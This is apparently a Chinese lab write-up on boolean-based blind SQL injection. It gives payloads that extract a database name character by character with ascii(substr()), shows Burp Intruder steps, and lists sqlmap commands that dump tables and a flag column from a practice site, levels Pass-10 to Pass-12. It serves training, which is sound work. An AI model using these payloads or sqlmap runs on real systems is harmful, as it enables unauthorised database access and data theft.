布尔盲注入

盲注引见

所谓的盲注就是在效劳器没有错误回显的时分完成的注入攻击。
效劳器没有错误回显,关于攻击者来说短少了十分重要的“调试信息”。
 

布尔盲注

布尔很明显Ture跟Fales,也就是说它只会依据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。
 

盲注函数

length() 函数 返回字符串的长度

substr() 截取字符串 (语法:SUBSTR(str,pos,len);)SUBSTR(截取什么字符,从哪里截取,截几长)

ascii() 返回字符的ascii码   [将字符变为数字wei]
 

当前数据库称号长度

?id=1 and length(database())>11

图片[1]-布尔盲注入-孤勇者社区

图片[2]-布尔盲注入-孤勇者社区

?id=1 and length(database())=12   当前库名:12个字符

图片[3]-布尔盲注入-孤勇者社区

 

数据库名

应用ASCII码猜解当前数据库称号:
and (ascii(substr(database(),1,1)))=115–+ 返回正常,阐明数据库称号第一位是s
and (ascii(substr(database(),2,1)))=101–+ 返回正常,阐明数据库称号第二位是e

?id=1 and substr(database(),1,1)='k'

图片[4]-布尔盲注入-孤勇者社区

要是用ABCD字母每一个字母都试一遍十分累

?id=1 and ascii(substr(database(),1,1))>107

图片[5]-布尔盲注入-孤勇者社区

?id=1 and ascii(substr(database(),1,1))=107

图片[6]-布尔盲注入-孤勇者社区

图片[7]-布尔盲注入-孤勇者社区

107代表字符是“K”
 

burp抓包

图片[8]-布尔盲注入-孤勇者社区

图片[9]-布尔盲注入-孤勇者社区

图片[10]-布尔盲注入-孤勇者社区

图片[11]-布尔盲注入-孤勇者社区

图片[12]-布尔盲注入-孤勇者社区

图片[13]-布尔盲注入-孤勇者社区

图片[14]-布尔盲注入-孤勇者社区

图片[15]-布尔盲注入-孤勇者社区

图片[16]-布尔盲注入-孤勇者社区

图片[17]-布尔盲注入-孤勇者社区

图片[18]-布尔盲注入-孤勇者社区

图片[19]-布尔盲注入-孤勇者社区

跑第二个数字

图片[20]-布尔盲注入-孤勇者社区

把1修正成2,也就是开端跑第二个数字

图片[21]-布尔盲注入-孤勇者社区

97是a

burp多个交换

图片[22]-布尔盲注入-孤勇者社区

图片[23]-布尔盲注入-孤勇者社区

图片[24]-布尔盲注入-孤勇者社区

图片[25]-布尔盲注入-孤勇者社区

数据库曾经爆出
107 97 110 119 111 108 111 110 103 120 105 97
kanwolongxia
 

sqlmap工具SQL注入

猜表名

and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101–+ 返回正常,阐明数据库表名的第一个的第一位是e

sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -v 3

图片[26]-布尔盲注入-孤勇者社区
 

猜字段名

and (ascii(substr((select column_name from information_schema.columns where table_name='zkaq' limit 0,1),1,1)))=102–+ 返回正常,阐明zkaq表中的列称号第一位是f

sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -T loflag –columns

图片[27]-布尔盲注入-孤勇者社区
 

猜内容

and (ascii(substr(( select zKaQ from zkaq limit 4,1),1,1)))=122–+返回正常,阐明zKaQ列第一位是z

sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -T loflag -C Id,flaglo –dump

图片[28]-布尔盲注入-孤勇者社区
 

Pass-11

闭合字符”

Sqlmap工具

数据库名

sqlmap -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 –level 3 –risk 2 –flush-session –dbs

图片[29]-布尔盲注入-孤勇者社区
 

猜表名

sqlmap -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 –level 3 –risk 2 –flush-session –tables -D kanwolongxia -v 3

图片[30]-布尔盲注入-孤勇者社区
 

猜字段名

sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -T loflag –columns

图片[31]-布尔盲注入-孤勇者社区
 

猜内容

sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -T loflag -C Id,flaglo –dump

图片[32]-布尔盲注入-孤勇者社区

 

Pass-12

数据库名

burp抓包

图片[33]-布尔盲注入-孤勇者社区

全部复制到kali系统内创立一个txt文件。

sqlmap -r sql.txt -b –dbs

图片[34]-布尔盲注入-孤勇者社区

 

猜表名

sqlmap -r sql.txt –tables -D kanwolongxia -v 3

图片[35]-布尔盲注入-孤勇者社区

 

猜字段名

sqlmap -r sql.txt –tables -D kanwolongxia -T loflag –columns

图片[36]-布尔盲注入-孤勇者社区
 

猜内容

sqlmap -r sql.txt –tables -D kanwolongxia -T loflag -C Id,flaglo –dump

图片[37]-布尔盲注入-孤勇者社区

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞6赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像果拟0